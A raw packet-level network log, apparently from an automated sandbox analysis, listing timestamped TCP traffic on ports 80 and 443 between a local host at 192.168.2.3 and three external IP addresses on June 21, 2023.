Jun 21, 2023 04:27:36.591510057 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.591598034 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.591609001 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.591639042 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.591669083 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.591691017 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.592601061 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.592634916 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.592655897 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.592667103 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.592694998 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.592724085 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.592742920 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.592827082 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.593708992 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.593739986 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.593766928 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.593796015 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.593837976 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.593869925 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.594674110 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.594733953 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.594764948 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.594784021 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.594794035 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.594822884 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.594835997 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.595668077 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.595698118 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.595717907 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.595727921 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.595757008 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.595777988 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.596549034 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.596579075 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.596602917 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.596623898 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.596652985 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.596671104 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.596782923 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.596833944 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.597543955 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.597568989 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.597594976 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.597611904 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.597620010 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.597666025 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.598597050 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.598623991 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.598648071 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.598668098 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.598674059 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.598702908 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.598731995 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.599543095 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.599566936 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.599592924 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.599601984 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.599631071 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.599643946 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.608470917 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608516932 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608532906 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.608551979 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608586073 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608594894 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.608622074 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608673096 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.608695030 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608728886 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608762026 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608772993 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.608795881 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608829021 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608839989 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.608861923 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608895063 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608906984 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.608931065 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608963013 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.608973026 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.608995914 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.609029055 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.609057903 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.609061003 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.609096050 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.609127998 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.609133005 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.609163046 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.609169960 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.609196901 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.609230042 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.609241009 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.653026104 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.676604033 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.696661949 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.696726084 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.696774006 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.696794987 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.696820974 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.696870089 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.714687109 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.714740038 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.714787960 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.714798927 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.714837074 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.714900017 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.715544939 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.715684891 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.715734959 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.715778112 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.715781927 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.715830088 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.715846062 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.716649055 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.716701031 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.716706038 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.716747999 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.716794968 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.716795921 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.717649937 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.717696905 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.717710972 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.717741966 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.717791080 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.717792034 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.717839003 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.717890024 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.718588114 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.718641043 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.718689919 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.718693018 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.718738079 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.718780041 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.719671965 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.719722033 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.719769001 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.719769955 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.719816923 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.719857931 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.719865084 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.728604078 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.728677988 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.728737116 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.728842020 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.728889942 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.728893995 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.728938103 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.728986025 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729033947 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729048967 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.729080915 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729115963 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.729130030 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729181051 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.729197979 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729265928 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729314089 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729327917 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.729361057 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729407072 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729435921 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.729451895 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729497910 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729543924 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729578018 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729610920 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729623079 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.729660988 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729710102 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729718924 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.729760885 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729779005 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.729809999 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729856014 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.729856968 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729904890 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729949951 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.729960918 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.729998112 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730045080 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730045080 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.730093002 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730143070 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730145931 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.730190992 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730242014 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.730257988 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730309963 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730355978 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730366945 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.730403900 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730449915 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730472088 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.730508089 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730556011 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730561018 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.730603933 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730643988 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.730654955 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730799913 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730844975 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730846882 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.730892897 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730942011 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.730950117 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.731544971 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.731591940 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.731610060 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.731647015 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.731690884 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.810324907 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.811372995 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.960529089 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:37.567069054 CEST	49698	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:37.584214926 CEST	80	49698	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:37.584487915 CEST	49698	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:37.810417891 CEST	49700	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:37.827282906 CEST	80	49700	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:37.828896046 CEST	49700	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:37.829260111 CEST	49700	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:37.829260111 CEST	49700	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:37.846204996 CEST	80	49700	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:37.846260071 CEST	80	49700	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:37.950582981 CEST	80	49700	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:37.950643063 CEST	80	49700	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:37.950809956 CEST	49700	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:38.034193039 CEST	49700	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:38.034256935 CEST	49700	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:38.051204920 CEST	80	49700	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:38.051258087 CEST	80	49700	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:38.108014107 CEST	80	49700	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:38.108069897 CEST	80	49700	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:38.108186960 CEST	49700	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:38.164221048 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:38.288454056 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.288831949 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:38.292407036 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:38.478600979 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.641859055 CEST	49702	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:38.641926050 CEST	443	49702	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:38.642033100 CEST	49702	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:38.669318914 CEST	49702	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:38.669378996 CEST	443	49702	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:38.757632971 CEST	443	49702	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:38.760662079 CEST	49702	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:38.778656960 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.778721094 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.778769970 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.778814077 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:38.779282093 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.780977964 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:38.907627106 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.907701015 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.907749891 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.907795906 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.907830954 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:38.908334017 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:38.908617020 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.908663988 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.908710003 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.908755064 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:38.908834934 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:38.908948898 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.009465933 CEST	49702	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:39.009525061 CEST	443	49702	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:39.010432959 CEST	443	49702	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:39.014672041 CEST	49702	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:39.016520023 CEST	49702	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:39.038753986 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.038819075 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.038876057 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.038921118 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.039191961 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.039522886 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.039627075 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.039674044 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.039683104 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.039721012 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.039764881 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.039787054 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.040232897 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.048674107 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.048758984 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.048836946 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.048890114 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.048924923 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.048938036 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.048985958 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.049031019 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.049031019 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.049047947 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.053443909 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.059633017 CEST	443	49702	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:39.059887886 CEST	443	49702	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:39.064851999 CEST	49702	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:39.137000084 CEST	49702	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:39.137064934 CEST	443	49702	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:39.179796934 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.179863930 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.179913998 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.179960012 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180006981 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180023909 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.180054903 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180084944 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.180102110 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180150032 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180159092 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.180197001 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180247068 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180315018 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.180324078 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180371046 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180402040 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.180416107 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180468082 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180514097 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.180515051 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180562019 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180565119 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.180609941 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.180651903 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.183674097 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.183739901 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.183785915 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.183831930 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.183881998 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.183918953 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.183918953 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.183929920 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.183978081 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.184026003 CEST	80	49701	37.34.248.24	192.168.2.3
